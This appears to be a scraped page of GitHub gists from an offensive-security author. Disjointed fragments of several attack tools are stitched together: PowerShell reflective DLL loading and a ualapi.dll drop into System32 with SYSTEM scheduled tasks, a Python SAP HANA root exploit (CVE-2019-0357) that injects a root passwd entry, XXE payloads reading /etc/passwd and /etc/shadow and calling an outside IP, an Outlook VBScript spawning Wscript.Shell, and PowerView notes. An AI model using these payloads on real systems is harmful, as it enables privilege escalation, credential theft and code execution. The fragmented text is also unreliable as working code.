function GetWinLogonTokenSystem
function reflectbin
This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process,
or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints,
function Ualapi
Write-Host "Dropping ualapi.dll in System32 Folder..."
if ([Environment]::Is64BitProcess)
function reflectit
This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process,
or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints,
please read the Notes section (GENERAL NOTES) for information on how to use them.
1.)Reflectively loads a DLL or EXE in to memory of the Powershell process.
$confirmpreference = "none"
function Get-ScheduledTaskSystem
$Name = -join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_})
$SystemUser = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount
S3cur3Th1sSh1t / CVE-2019-0357 - SAP-HANA root
Created February 6, 2020 08:04
CVE-2019-0357 - SAP-HANA root privesc vuln
import os
import signal
import sys
ATTEMPTS = (100 * 1000)
bin2exec = "/usr/sap/HXE/HDB90/exe/mdc/hdbmdcdispatcher"
socketfn = "/var/lib/hdb/HXE/ipc/hdbmdcdispatcher"
passwd_entry = b"anvil:x:0:0:Anvil Ventures:/root:/bin/bash"
import sys, hexdump, binascii
from Crypto.Cipher import AES
class AESCipher:
def __init__(self, key):
self.key = key
def decrypt(self, iv, data):
self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
return self.cipher.decrypt(data)
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>
Vanilla, used to verify outbound xxe or blind xxe
<?xml version="1.0" ?>
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<script id=clientEventHandlersVBS language=vbscript>
Sub window_onload()
Set Application = ViewCtl1.OutlookApplication
Set cmd = Application.CreateObject("Wscript.Shell")
S3cur3Th1sSh1t / PowerView-3.0-tricks.ps1
Created June 30, 2017 07:00 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here:
# tricks for the 'old' PowerView are at
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set